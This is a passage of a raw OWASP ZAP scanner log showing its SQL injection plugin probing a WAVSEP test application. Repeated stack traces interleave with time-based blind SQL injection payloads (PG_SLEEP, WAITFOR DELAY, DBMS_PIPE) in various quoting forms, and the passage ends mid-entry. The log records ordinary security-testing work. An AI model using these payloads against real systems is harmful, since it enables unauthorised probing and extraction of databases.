org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688302 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 5593=(SELECT 5593 FROM PG_SLEEP(5)) AND (8026=8026] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND 5593=(SELECT 5593 FROM PG_SLEEP(5)) AND (8026=8026 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688302 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 2967=(SELECT 2967 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 2967=(SELECT 2967 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688303 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 3580=(SELECT 3580 FROM PG_SLEEP(5)) AND ('FsnV'='FsnV] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') AND 3580=(SELECT 3580 FROM PG_SLEEP(5)) AND ('FsnV'='FsnV at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688304 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 4097=(SELECT 4097 FROM PG_SLEEP(5)) AND 'DCbM'='DCbM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' AND 4097=(SELECT 4097 FROM PG_SLEEP(5)) AND 'DCbM'='DCbM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688306 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 9594=(SELECT 9594 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' AND 9594=(SELECT 9594 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688307 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7599=(SELECT 7599 FROM PG_SLEEP(5))-- cukW] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini AND 7599=(SELECT 7599 FROM PG_SLEEP(5))-- cukW at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688308 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (8959=8959] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (8959=8959 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688309 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688310 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('BmnA'='BmnA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('BmnA'='BmnA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688311 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'bsGM'='bsGM] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'bsGM'='bsGM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688312 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688313 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- YOKF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- YOKF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688314 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 7970=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(107)||CHR(106)||CHR(78),5) AND (7613=7613] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) AND 7970=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(107)||CHR(106)||CHR(78),5) AND (7613=7613 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688316 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload 